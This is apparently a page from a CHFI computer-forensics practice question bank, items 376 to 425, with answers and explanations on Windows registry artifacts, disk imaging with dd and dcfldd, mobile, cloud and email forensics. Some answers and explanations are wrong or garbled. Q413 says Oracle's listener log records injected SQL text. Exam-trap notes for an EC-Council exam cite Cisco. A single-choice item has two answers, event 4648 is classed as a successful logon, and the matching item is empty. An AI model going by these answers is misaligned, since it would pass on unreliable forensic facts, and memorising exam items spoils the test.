Computer Hacking Forensic Investigator CHFI (CHFI) — Questions 376450

1000 questions total · 14pages · All types, answers revealed

Page 5

Page 6 of 14

Page 7
376
MCQeasy

What is the primary goal of computer forensics?

A.To prosecute cybercriminals
B.To recover deleted files for data recovery
C.To identify, preserve, analyze, and present digital evidence in a legally acceptable manner
D.To secure the network from future attacks
AnswerC

This encompasses the entire forensic process.

Why this answer

Computer forensics aims to preserve evidence in its most original form, identify the root cause of an incident, and document the investigation for legal proceedings.

377
MCQeasy

Which email header field is MOST reliable for identifying the true origin of an email, assuming no header tampering occurred at the initial MTA?

A.Received
B.Message-ID
C.From
D.DKIM-Signature
AnswerA

Received headers are added by each mail server and the earliest one usually contains the true originating IP.

Why this answer

The Received header chain shows the path the email took. The last Received header (from the originating server) is the most reliable for identifying the original sender's IP.

378
MCQmedium

A forensic examiner is analyzing an Android device and wants to extract the database containing the user's text messages (SMS). In which directory would the examiner typically find the SMS database on a non-rooted device?

A./data/data/com.android.providers.contacts/databases/
B./data/data/com.android.providers.calendar/databases/
C./data/data/com.android.providers.downloads/databases/
D./data/data/com.android.providers.telephony/databases/
AnswerD

mmssms.db is stored here.

Why this answer

The SMS database on Android devices is stored by the telephony provider, which manages SMS/MMS messages. On non-rooted devices, the database is located at /data/data/com.android.providers.telephony/databases/mmssms.db, as the package com.android.providers.telephony is the system application responsible for handling SMS and MMS operations.

Exam trap

EC-Council often tests the distinction between Android system packages; the trap here is confusing the telephony provider (SMS) with the contacts provider (call logs/contacts) or other providers, as candidates may incorrectly associate SMS with contacts due to their functional overlap in messaging apps.

How to eliminate wrong answers

Option A is wrong because com.android.providers.contacts manages contact data, not SMS messages; its databases contain contact information and call logs. Option B is wrong because com.android.providers.calendar handles calendar events and reminders, not SMS. Option C is wrong because com.android.providers.downloads manages download history and files, not SMS messages.

379
MCQhard

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

A.Cron job
B.Launch daemon
C.Login item
D.Kernel extension
AnswerB

LaunchDaemons plists in /Library/LaunchDaemons/ define system daemons that run as root at boot.

Why this answer

LaunchDaemons are used for system-wide daemons that start at boot. A plist in /Library/LaunchDaemons/ with ProgramArguments indicates a launch daemon persistence mechanism.

380
Multi-Selectmedium

Which TWO of the following are methods used to hide data within the NTFS file system?

Select 2 answers
A.USN Journal
B.File slack space
C.Volume Shadow Copy
D.Alternate Data Streams (ADS)
E.Encrypting File System (EFS)
AnswersB, D

Why this answer

ADS allows hiding data in streams attached to files, and slack space can hide data in unused bytes at the end of file clusters.

381
MCQmedium

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

A.Block the external IP at the firewall
B.Ignore the traffic as it is encrypted
C.Disable the server's network connection
D.Investigate the server for signs of compromise
AnswerD

Investigating the server will help determine if it is compromised and what actions to take.

Why this answer

The first step is to investigate the server to determine if it's compromised, as outbound connections could indicate C2 communication.

382
MCQhard

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

A.prefetch.exe (built‑in Windows tool)
B.ShellBags Explorer
C.PECmd
D.JumpLister
AnswerC

Correct. PECmd is the standard tool for parsing prefetch files.

Why this answer

Prefetch files contain metadata including last run time and run count. Tools like PECmd (from Eric Zimmerman's tools) are designed to parse .pf files forensically.

383
Multi-Selectmedium

Which TWO of the following are hardware write blockers commonly used in forensic acquisitions?

Select 2 answers
A.EnCase
B.FastBloc
C.dd
D.Tableau
E.FTK Imager
AnswersB, D

FastBloc is a hardware write blocker by Guidance Software.

Why this answer

FastBloc (Option B) is a hardware write blocker produced by Guidance Software that operates at the physical layer, intercepting ATA/ATAPI commands to prevent any write operations from reaching the suspect drive. It ensures bit-for-bit forensic acquisition without altering the source data, which is essential for maintaining evidentiary integrity.

Exam trap

Cisco often tests the distinction between hardware write blockers (physical devices) and forensic software tools (like EnCase, FTK Imager, or dd), leading candidates to mistakenly select software that can perform acquisitions but does not provide hardware-level write protection.

384
MCQeasy

Which principle states that every contact leaves a trace?

A.Locard's exchange principle
B.Chain of custody
C.Best evidence rule
D.Hearsay rule
AnswerA

Correct. This principle is fundamental in forensic science.

Why this answer

Locard's exchange principle is the foundational forensic concept stating that whenever two objects come into contact, there is a transfer of material between them. In computer forensics, this means that digital activity—such as accessing a file, sending a packet, or connecting to a network—inevitably leaves traces in logs, memory, registry entries, or file metadata. This principle underpins the entire discipline of digital evidence recovery.

Exam trap

EC-Council often tests the distinction between a forensic principle (Locard's) and legal or procedural rules (chain of custody, best evidence, hearsay), so candidates mistakenly select a legal term that sounds related to evidence handling rather than the core scientific concept.

How to eliminate wrong answers

Option B (Chain of custody) is wrong because it is a procedural documentation process that tracks the handling of evidence from collection to court presentation, not a principle about trace evidence. Option C (Best evidence rule) is wrong because it is a legal rule requiring original evidence (e.g., original hard drive rather than a copy) to be presented in court, not a statement about contact leaving traces. Option D (Hearsay rule) is wrong because it is a legal rule excluding out-of-court statements offered for the truth of the matter, unrelated to physical or digital trace evidence.

385
Multi-Selecthard

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Select 3 answers
A.Multiple failed login attempts in auth.log
B.Presence of system commands in web server error logs
C.Unusual files with .asp, .php, or .jsp extensions in web directories
D.Outbound connections from the web server to suspicious IP addresses
E.High CPU usage from the web server process
AnswersB, C, D

Webshells may execute system commands, appearing in error logs if output is not sanitized.

Why this answer

Webshells are malicious scripts uploaded to a web server. Indicators include anomalous file modifications in web directories, unexpected processes from web server user accounts, and outbound connections from the web server to unknown IPs. CPU spikes can occur but are less specific.

386
MCQmedium

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

A.HKLM\SAM\SAM
B.HKLM\Software\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D.HKLM\SYSTEM\CurrentControlSet\Services
AnswerB

Programs listed under this key run automatically at system startup.

Why this answer

The Run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run is a common location for programs to execute at startup. Similar keys exist in HKCU.

387
MCQhard

A security analyst runs a dynamic analysis of a suspected malware sample using Cuckoo Sandbox. The report shows that the sample created a mutex named 'Global\MyMaliciousMutex', added a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and attempted to communicate with an IP address 185.10.68.12 on port 443. Which of the following is the BEST immediate indicator of compromise (IoC) to share with the threat intelligence team?

A.The registry run key location
B.The sample's MD5 hash
C.The IP address 185.10.68.12
D.The mutex name 'Global\MyMaliciousMutex'
AnswerC

The C2 IP address can be blocked at the firewall or added to threat intel feeds to prevent further communication.

Why this answer

The network C2 IP address is direct and actionable for blocklisting. Registry keys and mutex names can be used for detection but are less definitive for network defense.

388
MCQmedium

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

A.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D.HKLM\SYSTEM\CurrentControlSet\Enum\USB
AnswerA

USBSTOR contains USB mass storage devices with serial numbers and timestamps.

Why this answer

The USBSTOR registry key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains subkeys for each USB device, with properties like serial number and first install date.

389
MCQhard

An investigator creates a forensic image using dcfldd with the following command: dcfldd if=/dev/sdb of=image.dd hash=sha256 hashwindow=10M hashlog=hash.txt. What is the effect of the 'hashwindow=10M' parameter?

A.It divides the output into 10 MB chunks and hashes each chunk, logging the results
B.It sets the input buffer size to 10 MB for performance
C.It verifies the hash of the input device in 10 MB windows before copying
D.It causes the tool to hash the entire image only after completion
AnswerA

This is the correct behavior; it enables piecewise verification.

Why this answer

Option A is correct because the `hashwindow=10M` parameter in dcfldd instructs the tool to compute a SHA-256 hash for every 10 MB segment (window) of the input data as it is being copied, and then log each segment's hash to the specified hashlog file. This allows the investigator to verify the integrity of individual chunks of the forensic image, which is useful for detecting corruption or tampering in specific regions of the image without rehashing the entire file.

Exam trap

Cisco often tests the distinction between 'hashing during acquisition' and 'hashing after completion' — the trap here is that candidates may assume `hashwindow` is for performance tuning (buffer size) or for pre-copy verification, rather than understanding it as a segmentation feature for incremental hashing and logging.

How to eliminate wrong answers

Option B is wrong because `hashwindow` does not control the input buffer size; dcfldd uses separate parameters (e.g., `bs=`) for block size and buffer settings, and `hashwindow` is specifically for segment-based hashing. Option C is wrong because `hashwindow` does not cause the tool to verify the hash of the input device before copying; it computes hashes of the output chunks during the copy process, not as a pre-copy verification step. Option D is wrong because `hashwindow=10M` causes hashing to occur incrementally during the imaging process, not only after completion; the `hashlog` file is populated as each 10 MB window is processed.

390
Multi-Selectmedium

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Select 2 answers
A.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\Software\Microsoft\Windows NT\CurrentVersion\Prefetch
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E.HKLM\SAM\SAM\Domains\Account\Users
AnswersA, B

USBSTOR lists all USB devices that have been connected.

Why this answer

USB device history is stored in USBSTOR and MountPoints2 keys.

391
MCQmedium

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

A.Wireshark
B.Volatility
C.Plaso (log2timeline)
D.FTK Imager
AnswerC

Plaso creates super timelines from multiple forensic artifacts.

Why this answer

Plaso (log2timeline) is a super timeline tool that parses multiple artifacts to create a comprehensive timeline. Wireshark is for network packets. FTK Imager is for acquisition.

Volatility is for memory analysis.

392
Matchingmedium

Match each file carving technique to its description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Uses file signatures to find start and end

Uses internal file structure metadata

Reassembles fragmented files

Uses statistical models to identify file types

Handles files split into two fragments

Why these pairings

These techniques recover files without filesystem metadata.

393
MCQeasy

During a forensic investigation, the first responder arrives at a scene where a computer is powered on and a user is logged in. Which of the following is the MOST appropriate initial action?

A.Immediately power off the computer to prevent data alteration
B.Begin collecting data by copying all files to an external drive
C.Disconnect the computer from the network and take a photograph of the screen
D.Ask the user to save their work and then shut down normally
AnswerC

This preserves the current state and documents the scene, which is standard first responder procedure.

Why this answer

Securing the scene and documenting everything is the first priority to preserve evidence and ensure chain of custody. Powering off or accessing the system without proper documentation can lead to evidence spoliation.

394
MCQeasy

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

A.Wireshark
B.Splunk
C.Nmap
D.SolarWinds NetFlow Traffic Analyzer
AnswerD

Specifically designed to collect and analyze NetFlow data.

Why this answer

Wireshark is a packet analyzer, not a NetFlow analyzer. Nmap scans networks. Splunk can analyze logs but is not specifically a NetFlow tool.

SolarWinds NetFlow Traffic Analyzer is designed for NetFlow analysis.

395
MCQeasy

Which of the following is a unique challenge in cloud forensics compared to traditional digital forensics?

A.Encryption of data at rest
B.Lack of network connectivity
C.Inability to acquire disk images
D.Multi-tenancy and data isolation
AnswerD

Multi-tenancy means evidence from one tenant may be co-mingled with others, complicating seizure and privacy.

Why this answer

Multi-tenancy (multiple customers sharing the same physical infrastructure) is a key challenge in cloud forensics because isolating evidence and maintaining data privacy across tenants is difficult.

396
MCQmedium

A forensic analyst needs to collect evidence from a running Windows system without altering the system state. Which tool should they use to acquire volatile memory?

A.Wireshark
B.dd
C.DumpIt
D.Tableau write blocker
AnswerC

DumpIt is a memory acquisition tool for Windows.

Why this answer

DumpIt is a lightweight memory acquisition tool designed specifically for capturing the contents of volatile memory (RAM) on a running Windows system. It minimizes interaction with the system to avoid altering the memory state, making it ideal for forensic collection of live evidence.

Exam trap

EC-Council often tests the distinction between volatile memory acquisition and disk imaging, leading candidates to confuse tools like dd (for disks) with memory-specific tools like DumpIt.

How to eliminate wrong answers

Option A is wrong because Wireshark is a network protocol analyzer used for capturing and inspecting network traffic, not for acquiring volatile memory from a running system. Option B is wrong because dd is a disk imaging tool typically used for creating bit-for-bit copies of storage devices, not for capturing RAM contents, and it does not handle Windows memory structures natively. Option D is wrong because a Tableau write blocker is a hardware device used to prevent writes to storage media during acquisition, but it does not acquire volatile memory; it is used for forensic imaging of hard drives or SSDs.

397
MCQeasy

An investigator needs to recover deleted files from a USB drive formatted with FAT32. Which of the following techniques would be most effective, assuming the files have not been overwritten?

A.Check the journal for recent changes
B.Examine the FAT for unallocated clusters and reconstruct files
C.Analyze the $MFT for orphaned entries
D.Use the 'foremost' tool to carve based on file signatures
AnswerB, D

Correct: In FAT32, the File Allocation Table can be used to chain clusters and recover files.

Why this answer

FAT32 stores directory entries that are marked as deleted but still contain file metadata; carving based on remnants of directory entries is effective.

398
MCQmedium

In an Azure environment, an investigator needs to review actions performed by a specific user over the past 30 days. Which Azure service provides the necessary audit logs for this purpose?

A.Azure Activity Log
B.Azure Security Center
C.Azure Monitor
D.Azure AD Audit Logs
AnswerA

The Activity Log is the subscription-level audit log for Azure resource operations.

Why this answer

Azure Activity Logs record all control-plane events (create, update, delete) for Azure resources, including user actions.

399
Multi-Selectmedium

Which THREE of the following are types of slack space that can contain hidden data on a hard disk?

Select 3 answers
A.Device Configuration Overlay
B.Host Protected Area
C.File slack
D.Volume slack
E.RAM slack
AnswersC, D, E

File slack is the unused space between the end of a file and the end of the last cluster.

Why this answer

File slack, volume slack, and RAM slack are types of slack space. HPA and DCO are hidden areas, not slack space.

400
MCQeasy

A forensic analyst needs to acquire RAM from a live Linux system for memory analysis. Which tool is specifically designed for this purpose and can capture memory without rebooting?

A.FTK Imager
B.Volatility
C.LiME
D.dd
AnswerC

LiME (Linux Memory Extractor) is the standard tool for Linux memory acquisition.

Why this answer

LiME (Linux Memory Extractor) is a kernel module that allows acquisition of volatile memory from Linux systems. It loads into the kernel and dumps RAM to a file or over the network.

401
MCQmedium

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

A.The web server is serving HTTPS traffic on port 4444
B.The web server is performing DNS queries
C.The web server is being scanned for open ports
D.The web server has a reverse shell connection to a command-and-control server
AnswerD

Outbound connections on non-standard ports (like 4444) from a server often indicate a reverse shell.

Why this answer

Port 4444 is commonly associated with reverse shells (e.g., Metasploit default). A web server making outbound connections to an external server on port 4444 strongly suggests a reverse shell from the web server to a command-and-control (C2) server.

402
Multi-Selecthard

Which THREE of the following are essential steps in the incident response process as defined by NIST SP 800-61? (Select exactly 3.)

Select 3 answers
A.Vulnerability Assessment
B.Post-Incident Activity
C.Preparation
D.Detection and Analysis
E.Penetration Testing
AnswersB, C, D

This phase includes lessons learned and evidence retention.

Why this answer

Option B is correct because Post-Incident Activity is one of the four core phases in the NIST SP 800-61 incident response lifecycle. This phase includes lessons learned, evidence retention, and report generation to improve future response efforts. Without this step, the organization cannot close the loop on security incidents or refine their detection and response capabilities.

Exam trap

EC-Council often tests the distinction between proactive security activities (like vulnerability assessments and penetration testing) and the reactive incident response phases defined in NIST SP 800-61, leading candidates to mistakenly select those proactive options as part of the incident response process.

403
Multi-Selectmedium

A malware analyst is performing static analysis on a suspicious PE file. Which TWO of the following are examples of anti-forensic techniques that the malware might use to hinder analysis? (Select TWO.)

Select 2 answers
A.Using TLS encryption for network communication
B.Packing or obfuscating the malicious code
C.Creating registry keys for persistence
D.Writing temporary files to the %TEMP% directory
E.Timestomping to modify file creation and modification timestamps
AnswersB, E

Packing obfuscates the code to evade signature detection and analysis.

Why this answer

Packing or obfuscating the malicious code (Option B) is a classic anti-forensic technique used to hinder static analysis. Packers compress or encrypt the original PE file's code and data, making it unreadable to disassemblers and signature-based scanners until the unpacking stub executes at runtime. This forces the analyst to perform dynamic analysis or manual unpacking, significantly increasing the time and complexity of the investigation.

Exam trap

EC-Council often tests the distinction between anti-forensic techniques (which actively hinder analysis) and common malware behaviors (which are forensic artifacts themselves), so candidates mistakenly select persistence or file-writing options as anti-forensic when they are actually evidence-creating actions.

404
MCQeasy

During an iOS forensics investigation, an examiner wants to extract call history records from an iPhone backup. Which SQLite database file should be examined?

A.SMS.db
B.AddressBook.db
C.call_history.db
D.Calendar.sqlitedb
AnswerC

call_history.db contains call records.

Why this answer

In iOS forensics, call history records are stored in the SQLite database file named 'call_history.db' (or 'CallHistory.storedata' in newer iOS versions). This database contains tables such as 'call' and 'ZCALLRECORD' that log incoming, outgoing, and missed calls along with timestamps and durations. Examining this file directly from an iTunes backup or device extraction provides the examiner with the complete call log.

Exam trap

EC-Council often tests the specific naming of iOS forensic artifacts; the trap here is that candidates confuse 'SMS.db' (which stores messages) with call logs, or assume call history is stored in a more generic database like 'AddressBook.db'.

How to eliminate wrong answers

Option A is wrong because SMS.db stores SMS and iMessage conversations, not call history records. Option B is wrong because AddressBook.db (or Contacts.sqlitedb) stores contact names, phone numbers, and email addresses, but does not contain call logs. Option D is wrong because Calendar.sqlitedb stores calendar events and reminders, not telephony call records.

405
MCQhard

During a forensic examination of a solid-state drive (SSD), you notice that files deleted several months ago cannot be recovered using traditional file carving tools. Which SSD feature is MOST likely preventing recovery?

A.TRIM
B.Over-provisioning
C.Garbage Collection
D.Wear levelling
AnswerA

TRIM causes the SSD to erase freed blocks, preventing recovery of deleted files via file carving.

Why this answer

TRIM is a command that allows the operating system to inform the SSD which data blocks are no longer in use. When TRIM is enabled, the SSD internally erases those blocks, making file carving ineffective for deleted files.

406
MCQeasy

A forensic analyst is examining a hard drive and needs to identify the number of sectors per track. Which component of the hard disk structure defines this?

A.Track
B.Sector
C.Cluster
D.Cylinder
AnswerA

Why this answer

A track is a circular division of data on a platter, and each track is divided into sectors. The number of sectors per track is a characteristic of the track itself.

407
MCQmedium

In a corporate investigation, legal counsel issues a litigation hold to preserve electronically stored information (ESI) relevant to a lawsuit. Which of the following is the BEST description of a litigation hold?

A.A form of encryption used to protect evidence during transport.
B.A notice to employees to preserve all relevant ESI and cease routine deletion.
C.A technique used to acquire forensic images without altering the source.
D.A court order authorizing law enforcement to seize computers.
AnswerB

Litigation holds require organizations to preserve potentially relevant data.

Why this answer

A litigation hold is a legal directive to prevent spoliation of evidence by suspending normal data retention and deletion policies.

408
MCQeasy

What is the primary goal of computer forensics?

A.To prevent future cyber attacks
B.To identify and prosecute cybercriminals
C.To preserve and analyze digital evidence in a legally admissible manner
D.To recover deleted files from a hard drive
AnswerC

This matches the definition of computer forensics.

Why this answer

The primary goal of computer forensics is to preserve and analyze digital evidence in a manner that is legally admissible in court.

409
MCQmedium

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

USBSTOR enumerates USB storage devices connected to the system.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains a list of all USB storage devices that have been connected, including their serial numbers.

410
MCQhard

During a forensic examination, an analyst runs the following command: 'dd if=/dev/sda of=/mnt/evidence/image.dd bs=4k conv=noerror,sync'. The source drive has bad sectors. What is the effect of the 'conv=noerror,sync' option?

A.It stops the imaging process when an error is encountered.
B.It skips the bad sectors and compresses the output.
C.It retries reading the bad sector multiple times before giving up.
D.It fills the bad sectors with zeros in the output image, allowing the imaging to complete without errors.
AnswerD

noerror continues on error, sync pads with zeros so the output size matches the input.

Why this answer

The 'noerror' option tells dd to continue reading after errors, and 'sync' pads the bad sectors with zeros to maintain the correct size.

411
MCQeasy

Which of the following is a key difference between static analysis and dynamic analysis in malware forensics?

A.Static analysis requires the malware to be executed, while dynamic analysis does not.
B.Static analysis is used only for packed malware, while dynamic analysis is used for unpacked.
C.Dynamic analysis uses tools like IDA Pro, while static uses Cuckoo Sandbox.
D.Static analyzes the code without execution; dynamic executes the malware.
AnswerD

Correct distinction.

Why this answer

Option D is correct because static analysis involves examining the malware's code (e.g., disassembly, string extraction, hash analysis) without executing it, while dynamic analysis runs the malware in a controlled sandbox environment to observe its runtime behavior, such as file system changes, registry modifications, and network connections. This fundamental distinction is critical in malware forensics to safely understand the threat without risking infection.

Exam trap

EC-Council often tests the reversal of definitions (execution vs. non-execution) to catch candidates who confuse static and dynamic analysis roles.

How to eliminate wrong answers

Option A is wrong because it reverses the definitions: static analysis does NOT require execution, while dynamic analysis does. Option B is wrong because static analysis can be applied to both packed and unpacked malware (though packing complicates static analysis), and dynamic analysis works regardless of packing by observing runtime behavior. Option C is wrong because IDA Pro is a static analysis tool (disassembler/decompiler), while Cuckoo Sandbox is a dynamic analysis tool (automated malware execution environment); the option swaps their correct classifications.

412
MCQmedium

During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?

A.Review the IAM policies attached to the user to determine if the action was authorized
B.Immediately disable the IAM user account
C.Escalate the issue to law enforcement
D.Check the S3 bucket's access logs for the same IP address
AnswerA

Logs show AccessDenied, so the user is blocked, but reviewing policies helps understand intent and whether policies are misconfigured.

Why this answer

AccessDenied indicates the user lacks permissions; check IAM policies to see if the user should have access or if it's an unauthorized attempt.

413
MCQeasy

A forensic analyst is investigating a compromised web application that uses an Oracle database. The analyst suspects that SQL injection was used to extract sensitive data. Which Oracle log source would provide evidence of the injected SQL statements?

A.Control file
B.Redo log files
C.Listener log (listener.log)
D.Alert log (alert_SID.log)
AnswerC

With audit enabled, the listener log can capture SQL statements.

Why this answer

The listener.log is the correct source because Oracle's listener records all client connections and SQL*Net traffic, including the raw SQL statements sent to the database. When SQL injection is performed, the injected payload is transmitted as part of the SQL query over the network, and the listener log captures these exact statements, providing direct evidence of the attack.

Exam trap

EC-Council often tests the misconception that redo logs or alert logs capture SQL statements, when in fact only the listener log records the actual SQL text sent over the network, while redo logs store only the resulting data changes and alert logs store administrative events.

How to eliminate wrong answers

Option A is wrong because the control file stores metadata about the physical structure of the database (datafile locations, checkpoint information) and does not log SQL statements. Option B is wrong because redo log files record changes made to data blocks for recovery purposes, not the original SQL text that caused those changes. Option D is wrong because the alert log (alert_SID.log) records significant database events (startups, shutdowns, errors) and administrative actions, but does not capture the actual SQL statements executed by users or applications.

414
MCQmedium

An analyst finds evidence that an attacker used steganography to hide data within image files on the suspect's computer. Which of the following tools is MOST appropriate for detecting steganography in these images?

A.Foremost
B.Autopsy
C.Stegdetect
D.Volatility
AnswerC

Stegdetect is designed to detect steganography in images.

Why this answer

StegExpose, StegDetect, or tools like `stegsolve` can detect steganography. Among the options, `stegdetect` is a known tool for detecting steganography in JPEG images.

415
MCQmedium

In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?

A.Azure AD Sign-In Logs
B.Azure Activity Log
C.Azure Diagnostic Logs
D.Azure Network Watcher Logs
AnswerB

Azure Activity Log records all control-plane events, including role assignments and changes to IAM policies.

Why this answer

Azure Activity Log captures all write operations (PUT, POST, DELETE) on Azure resources, including role assignments, making it the primary source for investigating privilege escalation.

416
Multi-Selecthard

A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?

Select 3 answers
A.The packets are sent to sequential IP addresses in the same subnet
B.No TCP three-way handshake completes for these connections
C.The source IP is from an internal address
D.The same port is targeted across multiple IP addresses
E.The payload contains exploit code for SMB vulnerability
AnswersA, B, D

Scanning often targets sequential or random IPs to find live hosts.

Why this answer

TCP SYN packets to multiple IPs on a single port indicate a port scan. The RST packets after a timeout suggest the targets did not respond, which is common in a sweep. Sequential IPs and the use of port 445 (SMB) are typical of scanning.

The lack of established connections and the specific pattern confirm scanning.

417
MCQmedium

An email investigator receives a suspicious email and examines the headers. The 'Received-SPF: pass (google.com: domain of example.com designates 203.0.113.5 as permitted sender)' header is present. However, the 'From' address is 'admin@example.com' and the 'Return-Path' is 'admin@example.com'. What does this indicate?

A.The email passed SPF alignment for the domain example.com
B.The email originated from 203.0.113.5
C.The email failed SPF check
D.The email is definitely legitimate
AnswerA

SPF pass indicates the sending IP is authorized; alignment with From domain is satisfied.

Why this answer

SPF check passed for the domain example.com, meaning the sending server (203.0.113.5) is authorized. This suggests the email is not spoofed from that domain, at least from SPF perspective.

418
MCQhard

During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?

A.VPC Flow Logs
B.Amazon Inspector findings
C.AWS Config
D.AWS CloudTrail
AnswerD

CloudTrail logs API calls with source IP.

Why this answer

AWS CloudTrail logs all API calls, including the source IP address of the request. By analyzing CloudTrail events for the RunInstances API, the analyst can see the IP address.

419
MCQmedium

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

A.Registry Run key persistence
B.Service installation
C.Scheduled task
D.Startup folder
AnswerA

The Run key automatically launches programs at user logon, a common persistence mechanism.

Why this answer

The Run key is a standard location for programs to auto-start when a user logs on. A malicious entry here indicates persistence via registry run keys.

420
MCQeasy

What is the primary purpose of maintaining a chain of custody during a forensic investigation?

A.To document the handling of evidence from collection to presentation in court
B.To reduce the size of evidence for easier storage
C.To analyze the evidence for hidden data
D.To encrypt the evidence to prevent unauthorized access
AnswerA

Chain of custody provides a clear record of evidence handling, ensuring admissibility.

Why this answer

The primary purpose of maintaining a chain of custody is to create a documented, unbroken record of every person who handled the evidence, from the moment it is collected until it is presented in court. This documentation is critical to establish the authenticity and integrity of the evidence, ensuring it has not been tampered with or altered, which is a foundational requirement for admissibility under legal standards like the Federal Rules of Evidence (FRE) 901. Without a proper chain of custody, the evidence can be challenged as inadmissible due to lack of trustworthiness.

Exam trap

EC-Council often tests the distinction between the chain of custody's documentation purpose and other forensic activities like analysis or security, so candidates mistakenly choose options that describe evidence handling steps (e.g., encryption or analysis) rather than the core legal documentation requirement.

How to eliminate wrong answers

Option B is wrong because reducing the size of evidence for easier storage is not a forensic goal; it would actually destroy or compress data, potentially losing critical metadata and violating the principle of maintaining evidence in its original state. Option C is wrong because analyzing evidence for hidden data is a separate investigative step (e.g., using tools like FTK or EnCase for steganography detection), not the purpose of the chain of custody, which is purely about documenting handling. Option D is wrong because encrypting evidence to prevent unauthorized access is a security measure, not a documentation process; encryption can even complicate chain of custody if the key is not properly managed, and the chain of custody itself does not involve cryptographic operations.

421
MCQeasy

Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?

A.EmailTrackerPro
B.Wireshark
C.Volatility
D.FTK Imager
AnswerA

EmailTrackerPro parses email headers and maps the route of an email.

Why this answer

EmailTrackerPro is specifically designed to analyze email headers and trace the path of an email.

422
Multi-Selectmedium

Which TWO Windows Event IDs are associated with successful logon events? (Select two.)

Select 2 answers
A.4648
B.4624
C.4625
D.7045
E.4720
AnswersA, B

4648 = A logon was attempted using explicit credentials (successful).

Why this answer

Event ID 4624 indicates successful logon; 4648 indicates a logon using explicit credentials (also successful).

423
MCQeasy

An Android phone is seized, and the forensic examiner needs to acquire the device in a forensically sound manner. The phone is running Android 12 and has USB debugging enabled. Which acquisition method provides the most complete data without physically modifying the device?

A.File system acquisition via Cellebrite UFED
B.Physical acquisition via ADB with appropriate exploit
C.Logical acquisition through ADB backup
D.Manual extraction using screen captures
AnswerB

Physical acquisition via ADB (e.g., using dd or a custom recovery) can obtain a full physical image, providing the most comprehensive data.

Why this answer

Option B is correct because physical acquisition via ADB with an appropriate exploit allows the examiner to obtain a complete bit-for-bit copy of the device's flash memory, including deleted data and unallocated space, without physically modifying the device. Since Android 12 has USB debugging enabled, ADB can be used to push an exploit that bypasses security restrictions to perform a physical dump, which is the most comprehensive method available for this scenario.

Exam trap

EC-Council often tests the misconception that file system acquisition via Cellebrite UFED is the most complete method, but candidates must remember that physical acquisition captures raw flash memory including deleted data, whereas file system acquisition only retrieves active files.

How to eliminate wrong answers

Option A is wrong because Cellebrite UFED file system acquisition typically extracts only the file system structure (files and directories) and does not capture raw flash memory or unallocated space, missing deleted data and hidden partitions. Option C is wrong because logical acquisition through ADB backup only retrieves app data and system settings specified by the backup API, not the entire device storage, and it cannot recover deleted files or raw disk images. Option D is wrong because manual extraction using screen captures is not a forensic acquisition method; it only captures visible screen content and provides no access to underlying data, making it forensically unsound and incomplete.

424
Multi-Selecthard

A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?

Select 2 answers
A.The service account can be used to escalate privileges by attaching it to resources
B.The audit logging is now disabled for that service account
C.The service account's keys are automatically rotated
D.Cross-project access may allow lateral movement
E.The service account can now impersonate any user in the project
AnswersA, D

With the role, the service account can be attached to resources, gaining its permissions.

Why this answer

This privilege escalation allows the service account to impersonate other accounts and potentially access resources across projects.

425
MCQmedium

A forensic analyst is testifying as an expert witness in court. The opposing counsel challenges the analyst's testimony based on the Frye standard. What does the Frye standard require for scientific evidence to be admissible?

A.The evidence must have been obtained with a warrant.
B.The evidence must be relevant and more probative than prejudicial.
C.The evidence must have been peer-reviewed and published.
D.The evidence must be based on techniques generally accepted in the scientific community.
AnswerD

